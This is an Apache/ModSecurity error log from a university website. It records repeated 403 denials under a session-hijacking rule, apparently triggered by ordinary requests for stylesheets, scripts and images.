[Mon Aug 28 08:42:29.822229 2023] [:error] [pid 38114] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/rekrut_dosen.jpg"] [unique_id "ZOv7hcCo-f0AAJTiodEAAAAE"]
[Mon Aug 28 08:42:31.028084 2023] [:error] [pid 38502] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv7h8Co-f0AAJZmpsUAAAAA"]
[Mon Aug 28 08:42:49.338849 2023] [:error] [pid 38065] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv7mcCo-f0AAJSxZxcAAAAH"]
[Mon Aug 28 08:42:50.142963 2023] [:error] [pid 38303] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv7msCo-f0AAJWfaBsAAAAI"]
[Mon Aug 28 08:43:39.860237 2023] [:error] [pid 38644] [client 36.71.248.53] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/base.css"] [unique_id "ZOv7y8Co-f0AAJb0F78AAAAK"]
[Mon Aug 28 08:43:39.862154 2023] [:error] [pid 38539] [client 36.71.248.53] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/skeleton.css"] [unique_id "ZOv7y8Co-f0AAJaL2S4AAAAG"]
[Mon Aug 28 08:43:39.928136 2023] [:error] [pid 38641] [client 36.71.248.53] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/layout.css"] [unique_id "ZOv7y8Co-f0AAJbxo6UAAAAJ"]
[Mon Aug 28 08:43:39.964282 2023] [:error] [pid 38386] [client 36.71.248.53] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/logo-header.png"] [unique_id "ZOv7y8Co-f0AAJXyOjUAAAAM"]
[Mon Aug 28 08:44:01.071309 2023] [:error] [pid 38539] [client 36.71.248.53] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv74cCo-f0AAJaL2TAAAAAG"]
[Mon Aug 28 08:44:20.428091 2023] [:error] [pid 38386] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/reset-min.css"] [unique_id "ZOv79MCo-f0AAJXyOjkAAAAM"]
[Mon Aug 28 08:44:20.457554 2023] [:error] [pid 38641] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/style.css"] [unique_id "ZOv79MCo-f0AAJbxo6kAAAAJ"]
[Mon Aug 28 08:44:20.478676 2023] [:error] [pid 38643] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/gallery_album.css"] [unique_id "ZOv79MCo-f0AAJbzb-wAAAAD"]
[Mon Aug 28 08:44:20.483052 2023] [:error] [pid 38502] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/ddsmoothmenu.css"] [unique_id "ZOv79MCo-f0AAJZmptMAAAAA"]
[Mon Aug 28 08:44:20.495633 2023] [:error] [pid 38059] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/jquery.fancybox-1.3.4.css"] [unique_id "ZOv79MCo-f0AAJSr3z4AAAAO"]
[Mon Aug 28 08:44:20.499371 2023] [:error] [pid 38607] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/nivo-slider.css"] [unique_id "ZOv79MCo-f0AAJbPEM8AAAAC"]
[Mon Aug 28 08:44:20.619953 2023] [:error] [pid 38644] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/scripts.js"] [unique_id "ZOv79MCo-f0AAJb0F8QAAAAK"]
[Mon Aug 28 08:44:20.631241 2023] [:error] [pid 38643] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.fancybox.settings.js"] [unique_id "ZOv79MCo-f0AAJbzb-0AAAAD"]
[Mon Aug 28 08:44:20.631361 2023] [:error] [pid 38502] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/AC_RunActiveContent.js"] [unique_id "ZOv79MCo-f0AAJZmptQAAAAA"]
[Mon Aug 28 08:44:20.632397 2023] [:error] [pid 38539] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.fancybox-1.3.4.js"] [unique_id "ZOv79MCo-f0AAJaL2TIAAAAG"]
[Mon Aug 28 08:44:20.680373 2023] [:error] [pid 38386] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/cufon-yui.js"] [unique_id "ZOv79MCo-f0AAJXyOjoAAAAM"]
[Mon Aug 28 08:44:20.747587 2023] [:error] [pid 38607] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/Sansation_300-Sansation_700.font.js"] [unique_id "ZOv79MCo-f0AAJbPENAAAAAC"]
[Mon Aug 28 08:44:20.795347 2023] [:error] [pid 38303] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.nivo.slider.pack.js"] [unique_id "ZOv79MCo-f0AAJWfaCQAAAAI"]
[Mon Aug 28 08:44:20.807933 2023] [:error] [pid 38539] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/ddsmoothmenu.settings.js"] [unique_id "ZOv79MCo-f0AAJaL2TMAAAAG"]
[Mon Aug 28 08:44:20.809394 2023] [:error] [pid 38643] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.nivo.slider.settings.js"] [unique_id "ZOv79MCo-f0AAJbzb-4AAAAD"]
[Mon Aug 28 08:44:20.809632 2023] [:error] [pid 38059] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/ddsmoothmenu.js"] [unique_id "ZOv79MCo-f0AAJSr3z8AAAAO"]
[Mon Aug 28 08:44:20.813276 2023] [:error] [pid 38502] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/aslider.js"] [unique_id "ZOv79MCo-f0AAJZmptUAAAAA"]
[Mon Aug 28 08:44:20.854986 2023] [:error] [pid 38386] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/slidingboxes.js"] [unique_id "ZOv79MCo-f0AAJXyOjsAAAAM"]
[Mon Aug 28 08:44:20.909279 2023] [:error] [pid 38303] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/supersleight.plugin.js"] [unique_id "ZOv79MCo-f0AAJWfaCUAAAAI"]
[Mon Aug 28 08:44:20.909597 2023] [:error] [pid 38641] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/css/xtheme-gray.css"] [unique_id "ZOv79MCo-f0AAJbxo6oAAAAJ"]
[Mon Aug 28 08:44:20.912593 2023] [:error] [pid 38607] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/css/ext-all.css"] [unique_id "ZOv79MCo-f0AAJbPENEAAAAC"]
[Mon Aug 28 08:44:20.915654 2023] [:error] [pid 38502] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/styleswitch.js"] [unique_id "ZOv79MCo-f0AAJZmptYAAAAA"]
[Mon Aug 28 08:44:20.924328 2023] [:error] [pid 38059] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext_plugins/statusbar/css/statusbar.css"] [unique_id "ZOv79MCo-f0AAJSr30AAAAAO"]
[Mon Aug 28 08:44:20.968780 2023] [:error] [pid 38643] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/data-view.css"] [unique_id "ZOv79MCo-f0AAJbzb-8AAAAD"]
[Mon Aug 28 08:44:21.007953 2023] [:error] [pid 38502] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/examples.css"] [unique_id "ZOv79cCo-f0AAJZmptcAAAAA"]
[Mon Aug 28 08:44:21.012622 2023] [:error] [pid 38303] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/fileuploadfield.css"] [unique_id "ZOv79cCo-f0AAJWfaCYAAAAI"]
[Mon Aug 28 08:44:21.045733 2023] [:error] [pid 38641] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/icons/silk.css"] [unique_id "ZOv79cCo-f0AAJbxo6sAAAAJ"]
[Mon Aug 28 08:44:21.053338 2023] [:error] [pid 38059] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/treegrid/treegrid.css"] [unique_id "ZOv79cCo-f0AAJSr30EAAAAO"]
[Mon Aug 28 08:44:21.067443 2023] [:error] [pid 38607] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/tabs.css"] [unique_id "ZOv79cCo-f0AAJbPENIAAAAC"]
[Mon Aug 28 08:44:21.112263 2023] [:error] [pid 38386] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/adapter/ext/ext-base.js"] [unique_id "ZOv79cCo-f0AAJXyOjwAAAAM"]
[Mon Aug 28 08:44:21.139461 2023] [:error] [pid 38643] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/store/DataMasterPublic.js"] [unique_id "ZOv79cCo-f0AAJbzcAAAAAAD"]
[Mon Aug 28 08:44:21.139545 2023] [:error] [pid 38539] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ext-all.js"] [unique_id "ZOv79cCo-f0AAJaL2TQAAAAG"]
[Mon Aug 28 08:44:21.161654 2023] [:error] [pid 38641] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/find_m.js"] [unique_id "ZOv79cCo-f0AAJbxo6wAAAAJ"]
[Mon Aug 28 08:44:21.168873 2023] [:error] [pid 38644] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/pendaftaran/verifikasipmb_form.js"] [unique_id "ZOv79cCo-f0AAJb0F8UAAAAK"]
[Mon Aug 28 08:44:21.178300 2023] [:error] [pid 38303] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/form/NumberField.js"] [unique_id "ZOv79cCo-f0AAJWfaCcAAAAI"]
[Mon Aug 28 08:44:21.224281 2023] [:error] [pid 38059] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/website/ftracerstudy.js"] [unique_id "ZOv79cCo-f0AAJSr30IAAAAO"]
[Mon Aug 28 08:44:21.252562 2023] [:error] [pid 38502] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.ScrollTo.js"] [unique_id "ZOv79cCo-f0AAJZmptgAAAAA"]
[Mon Aug 28 08:44:21.253622 2023] [:error] [pid 38641] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.mousewheel-3.0.4.pack.js"] [unique_id "ZOv79cCo-f0AAJbxo60AAAAJ"]
[Mon Aug 28 08:44:21.283641 2023] [:error] [pid 38644] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/Ext.ux.grid.Search.js"] [unique_id "ZOv79cCo-f0AAJb0F8YAAAAK"]
[Mon Aug 28 08:44:21.298057 2023] [:error] [pid 38059] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/css/Spinner.css"] [unique_id "ZOv79cCo-f0AAJSr30MAAAAO"]
[Mon Aug 28 08:44:21.321677 2023] [:error] [pid 38502] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery-1.4.4.min.js"] [unique_id "ZOv79cCo-f0AAJZmptkAAAAA"]
[Mon Aug 28 08:44:21.418196 2023] [:error] [pid 38539] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/menu.css"] [unique_id "ZOv79cCo-f0AAJaL2TUAAAAG"]
[Mon Aug 28 08:44:21.467618 2023] [:error] [pid 38607] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/scripts.js"] [unique_id "ZOv79cCo-f0AAJbPENMAAAAC"]
[Mon Aug 28 08:44:21.479120 2023] [:error] [pid 38643] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/dark.css"] [unique_id "ZOv79cCo-f0AAJbzcAEAAAAD"]
[Mon Aug 28 08:44:21.579254 2023] [:error] [pid 38059] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/blue.css"] [unique_id "ZOv79cCo-f0AAJSr30QAAAAO"]
[Mon Aug 28 08:44:21.580380 2023] [:error] [pid 38303] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.ScrollTo.js"] [unique_id "ZOv79cCo-f0AAJWfaCgAAAAI"]
[Mon Aug 28 08:44:21.677042 2023] [:error] [pid 38643] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/bg.css"] [unique_id "ZOv79cCo-f0AAJbzcAIAAAAD"]
[Mon Aug 28 08:44:21.708437 2023] [:error] [pid 38607] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/AC_RunActiveContent.js"] [unique_id "ZOv79cCo-f0AAJbPENQAAAAC"]
[Mon Aug 28 08:44:21.720113 2023] [:error] [pid 38386] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/green.css"] [unique_id "ZOv79cCo-f0AAJXyOj0AAAAM"]
[Mon Aug 28 08:44:21.814979 2023] [:error] [pid 38303] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/style100.css"] [unique_id "ZOv79cCo-f0AAJWfaCkAAAAI"]
[Mon Aug 28 08:44:21.819070 2023] [:error] [pid 38059] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/dark100.css"] [unique_id "ZOv79cCo-f0AAJSr30UAAAAO"]
[Mon Aug 28 08:44:21.839713 2023] [:error] [pid 38644] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.mousewheel-3.0.4.pack.js"] [unique_id "ZOv79cCo-f0AAJb0F8cAAAAK"]
[Mon Aug 28 08:44:22.003450 2023] [:error] [pid 38641] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.fancybox-1.3.4.js"] [unique_id "ZOv79sCo-f0AAJbxo64AAAAJ"]
